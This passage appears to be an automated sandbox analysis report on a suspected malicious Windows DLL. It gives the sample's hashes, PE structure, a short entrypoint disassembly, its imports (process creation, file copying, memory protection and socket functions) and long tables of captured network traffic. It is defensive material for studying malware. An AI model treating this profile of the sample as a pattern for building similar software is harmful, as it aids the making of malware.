2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nrrV67478[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	88164
Entropy (8bit):	5.423101112677061
Encrypted:	false
SSDEEP:	1536:DVnCuukXGsQihGZFu94xdV2E4q35nJy0ukWaaCUFP+i/TX6Y+fj4/fhAaTZae:DQiYpdVGetuVLKY+fjwZ
MD5:	C2DC0FFE06279ECC59ACBC92A443FFD4
SHA1:	C271908D08B13E08BFD5106EE9F4E6487A3CDEC4
SHA-256:	51A34C46160A51FB0EAB510A83D06AA9F593C8BEB83099D066924EAC4E4160BC
SHA-512:	6B9EB80BD6BC121F4B8E23FC74FD21C81430EE10B39B1EDBDEFF29C04A3116EB12FC2CC633A5FF4C948C16FEF9CD258E0ED0743D3D9CB0EE78A253B6F5CBE05D
Malicious:	false
IE Cache URL:	https://contextual.media.net/48/nrrV67478.js
Preview:	var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]\|\|(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)\|\|""===n\|\|null===n\|\|(n=t,"[object Array]"!==Object.prototype.toString.call(n))\|\|!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},n={},t={},a={};function c(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=c("conversionpixelcontroller"),e=c("browserhinter"),o=c("kwdClickTargetModifier"),i=c("hover"),n=c("mraidDelayedLogging"),t=c("macrokeywords"),a=c("tcfdatamanager"),{conversionPixelController:r,browserHinter:e,hover:i,keywordClickTargetModifier:o,mraidDelayedLogging:n,macroKeyw

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.790714264316921
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
File size:	360448
MD5:	f76b81b0397ae313b8f6d19d95c49edf
SHA1:	8f15106b524cc5db564845508a04ee3bf2709949
SHA256:	3e8b92cda2c0d1dc74de0b060f43c2baf23ab08af69667ddbbe66f78d5e0389a
SHA512:	d473bb6f8ae26418dffe3e9acaf6266e305c012b2fb57d5e82c8ffbc4c9cae6f1a4e496d5f3bdf0b7228964862a392f552b5847370331d8ad5fea9be7f3af9a6
SSDEEP:	6144:b87Sm49lFRQSAe5klIQm3n/ym1grjpY7nf9+v3lYdkv+hgG2xnG4c/gU:fm+3QSAdm3n/yogZgwv3Gqv0gG2tG4gv
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.6.&.X.&.X.&.X..F%.>.X..F6...X..F5...X./...#.X.&.Y.I.X..F*.'.X..F".'.X..F$.'.X..F .'.X.Rich&.X.........PE..L...y..E...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x100285d5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x45B6F579 [Wed Jan 24 05:58:17 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e0e710d4ed87ec11636d345dba071187

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007FACDCACCC57h
call 00007FACDCAD5A00h
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007FACDCACCB42h
pop ecx
retn 000Ch
mov eax, dword ptr [esp+04h]
xor ecx, ecx
cmp eax, dword ptr [100503A0h+ecx*8]
je 00007FACDCACCC64h
inc ecx
cmp ecx, 2Dh
jl 00007FACDCACCC43h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FACDCACCC5Eh
push 0000000Dh
pop eax
ret
mov eax, dword ptr [100503A4h+ecx*8]
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
ret
call 00007FACDCAD3448h
test eax, eax
jne 00007FACDCACCC58h
mov eax, 10050508h
ret
add eax, 08h
ret
call 00007FACDCAD3435h
test eax, eax
jne 00007FACDCACCC58h
mov eax, 1005050Ch
ret
add eax, 0Ch
ret
push esi
call 00007FACDCACCC3Ch
mov ecx, dword ptr [esp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007FACDCACCBE2h
pop ecx
mov esi, eax
call 00007FACDCACCC15h
mov dword ptr [eax], esi
pop esi
ret
push ebp
mov ebp, esp
sub esp, 48h
mov eax, dword ptr [10050514h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
cmp dword ptr [esi+14h], ebx
push edi
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-28h], ebx

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4f020	0x93	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4e754	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb1000	0x4d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb2000	0x1c98	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3e220	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4cc28	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3e000	0x1b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3c44c	0x3d000	False	0.709148469518	data	6.87914572387	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3e000	0x110b3	0x12000	False	0.671644422743	data	6.3835832451	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x50000	0x604c8	0x4000	False	0.558715820312	COM executable for DOS	5.48871661926	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xb1000	0x4d0	0x1000	False	0.150146484375	data	1.65729733757	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb2000	0x2c74	0x3000	False	0.485595703125	data	4.83368153083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xb10a0	0x2b0	data	English	United States
RT_MANIFEST	0xb1350	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

ExitProcess, GetFileAttributesA, CreateProcessA, GetSystemDirectoryA, GetEnvironmentVariableA, MultiByteToWideChar, GetShortPathNameA, CopyFileA, GetTempFileNameA, LoadLibraryA, WaitForMultipleObjects, GetModuleFileNameA, VirtualProtect, GetCurrentProcessId, CompareStringW, CompareStringA, CreateFileA, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, ReadFile, GetLocaleInfoW, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetTimeFormatA, GetDateFormatA, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCommandLineA, GetVersionExA, HeapAlloc, GetProcessHeap, GetCPInfo, RaiseException, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, GetProcAddress, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetACP, GetOEMCP, GetTimeZoneInformation, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, HeapSize, GetUserDefaultLCID, SetEnvironmentVariableA

WS2_32.dll

ioctlsocket, inet_ntoa, WSAStartup, recvfrom, ntohl, inet_addr, htons, WSACleanup, recv, socket, getservbyname, send, getsockopt, listen

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10021230
Exactnature	2	0x10021130
Happenthousand	3	0x100215a0
Probablepath	4	0x10021650

Version Infos

Description	Data
LegalCopyright	Copyright Strongimagine 1996-2016
FileVersion	8.3.8.121
CompanyName	Strongimagine
ProductName	Room know
ProductVersion	8.3.8.121 Soundbank
FileDescription	Room know
OriginalFilename	Sing.dll
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/16/21-00:58:10.168631	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 16, 2021 00:57:34.691473007 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.711564064 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.742607117 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.742716074 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.757204056 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.762904882 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.763009071 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.791100025 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.810581923 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.812463045 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.812472105 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.812580109 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.836986065 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.840151072 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.840368986 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.842098951 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.844362974 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.844383001 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.844460964 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.844490051 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.888045073 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.888201952 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.888247967 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.888289928 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.888334036 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.891134977 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.891165972 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.891232967 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.901031971 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.901072025 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.901124001 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.901169062 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.904736996 CET	49746	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.918406963 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.919996023 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.969549894 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.969671011 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.969683886 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.969769955 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.969788074 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.970529079 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.971085072 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.971318960 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:34.971410036 CET	49747	443	192.168.2.4	104.20.184.68
Feb 16, 2021 00:57:34.995932102 CET	443	49746	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:35.064992905 CET	443	49747	104.20.184.68	192.168.2.4
Feb 16, 2021 00:57:39.482304096 CET	49759	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.482346058 CET	49760	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.482587099 CET	49761	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.482667923 CET	49762	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.482676983 CET	49764	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.482687950 CET	49763	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.527659893 CET	443	49759	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.527690887 CET	443	49760	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.527786970 CET	49759	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.527810097 CET	49760	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.528208017 CET	443	49761	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.528247118 CET	443	49762	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.528274059 CET	443	49763	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.528316975 CET	443	49764	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.528342009 CET	49761	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.528389931 CET	49762	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.528392076 CET	49763	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.528409004 CET	49764	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.532202959 CET	49764	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.537482977 CET	49763	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.538105011 CET	49759	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.538821936 CET	49760	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.556309938 CET	49761	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.556982040 CET	49762	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.577560902 CET	443	49764	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.578695059 CET	443	49764	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.578738928 CET	443	49764	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.578768969 CET	49764	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.578773975 CET	443	49764	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.578792095 CET	49764	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.578829050 CET	49764	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.583000898 CET	443	49763	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.583566904 CET	443	49759	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.584065914 CET	443	49763	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.584101915 CET	443	49763	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.584134102 CET	443	49763	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.584135056 CET	49763	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.584153891 CET	49763	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.584160089 CET	443	49760	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.584183931 CET	49763	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.584602118 CET	443	49759	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.584639072 CET	443	49759	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.584670067 CET	49759	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.584671021 CET	443	49759	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.584681988 CET	49759	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.584836960 CET	49759	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.585165024 CET	443	49760	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.585203886 CET	443	49760	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.585233927 CET	443	49760	151.101.1.44	192.168.2.4
Feb 16, 2021 00:57:39.585247040 CET	49760	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.585264921 CET	49760	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.585298061 CET	49760	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.592503071 CET	49764	443	192.168.2.4	151.101.1.44
Feb 16, 2021 00:57:39.592982054 CET	49764	443	192.168.2.4	151.101.1.44

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 16, 2021 00:57:23.851677895 CET	49910	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:23.900485992 CET	53	49910	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:25.017621040 CET	55854	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:25.069145918 CET	53	55854	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:26.418047905 CET	64549	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:26.469609022 CET	53	64549	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:27.394536018 CET	63153	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:27.445816994 CET	53	63153	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:29.038602114 CET	52991	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:29.087210894 CET	53	52991	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:30.450037003 CET	53700	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:30.477531910 CET	51726	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:30.501523018 CET	53	53700	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:30.538741112 CET	53	51726	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:31.518785000 CET	56794	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:31.577409983 CET	53	56794	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:31.814762115 CET	56534	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:31.854856014 CET	56627	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:31.865664005 CET	53	56534	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:31.906656981 CET	53	56627	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:32.292648077 CET	56621	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:32.341365099 CET	53	56621	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:32.361624956 CET	63116	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:32.424207926 CET	53	63116	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:34.188555002 CET	64078	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:34.256162882 CET	53	64078	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:34.628803015 CET	64801	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:34.677495003 CET	53	64801	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:34.713625908 CET	61721	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:34.785234928 CET	53	61721	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:36.568550110 CET	51255	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:36.635288954 CET	53	51255	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:37.263225079 CET	61522	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:37.338659048 CET	53	61522	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:37.863677979 CET	52337	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:37.924860954 CET	53	52337	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:38.229052067 CET	55046	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:38.288559914 CET	53	55046	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:38.749363899 CET	49612	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:38.797986984 CET	53	49612	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:39.318974018 CET	49285	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:39.378199100 CET	53	49285	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:41.428900957 CET	50601	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:41.477629900 CET	53	50601	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:42.392105103 CET	60875	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:42.440912962 CET	53	60875	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:46.480389118 CET	56448	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:46.529041052 CET	53	56448	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:47.485802889 CET	59172	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:47.534482956 CET	53	59172	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:48.826155901 CET	62420	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:48.874833107 CET	53	62420	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:50.114090919 CET	60579	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:50.165975094 CET	53	60579	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:51.658611059 CET	50183	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:51.707384109 CET	53	50183	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:52.600389957 CET	61531	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:52.649260044 CET	53	61531	8.8.8.8	192.168.2.4
Feb 16, 2021 00:57:58.247303963 CET	49228	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:57:58.305866003 CET	53	49228	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:00.407489061 CET	59794	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:00.464531898 CET	53	59794	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:01.269284964 CET	55916	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:01.318131924 CET	53	55916	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:01.437333107 CET	59794	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:01.494563103 CET	53	59794	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:02.275814056 CET	55916	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:02.324444056 CET	53	55916	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:02.444276094 CET	59794	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:02.501357079 CET	53	59794	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:03.287058115 CET	55916	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:03.344410896 CET	53	55916	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:04.454550982 CET	59794	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:04.514353991 CET	53	59794	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:05.298243046 CET	55916	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:05.346859932 CET	53	55916	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:08.521122932 CET	59794	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:08.569654942 CET	53	59794	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:08.847168922 CET	52752	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:09.309441090 CET	55916	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:09.359087944 CET	53	55916	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:09.856961966 CET	52752	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:10.156774998 CET	53	52752	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:10.168512106 CET	53	52752	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:12.720505953 CET	60542	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:12.778403997 CET	53	60542	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:13.333923101 CET	60689	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:13.385102987 CET	53	60689	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:13.473896980 CET	64206	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:13.533735991 CET	53	64206	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:13.779700994 CET	50904	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:13.839030027 CET	53	50904	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:14.131258965 CET	57525	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:14.188517094 CET	53	57525	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:14.923285007 CET	53814	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:14.975915909 CET	53	53814	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:15.465820074 CET	53418	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:15.524085999 CET	53	53418	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:16.123310089 CET	62833	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:16.149136066 CET	59260	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:16.183051109 CET	53	62833	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:16.208272934 CET	53	59260	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:16.857649088 CET	49944	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:16.906308889 CET	53	49944	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:17.105812073 CET	63300	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:17.165864944 CET	53	63300	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:17.778377056 CET	61449	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:17.835416079 CET	53	61449	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:19.385588884 CET	51275	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:19.442615986 CET	53	51275	8.8.8.8	192.168.2.4
